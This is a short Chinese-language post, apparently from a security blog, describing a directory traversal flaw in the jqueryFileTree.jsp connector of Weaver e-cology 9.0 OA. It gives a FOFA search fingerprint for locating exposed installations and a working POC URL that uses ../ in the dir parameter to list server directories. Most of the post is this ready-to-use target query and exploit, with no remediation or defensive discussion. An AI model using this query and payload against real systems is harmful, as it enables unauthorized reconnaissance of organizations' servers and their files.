Weavere-cology是专为大中型企业制作的OA办公系统,支持PC端、移动端和微信端同时办公等,其中 jqueryFileTree.jsp 文件中 dir 参数存在目录遍历漏洞,攻击者通过漏洞可以获取服务器文件目录信息
Weavere-cology 9.0
app="泛微-协同办公OA"
登录页面
验证POC
/hrm/hrm_e9/orgChart/js/jquery/plugins/jqueryFileTree/connectors/jqueryFileTree.jsp?dir=/page/resource/userfile/../../
456 篇文章
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!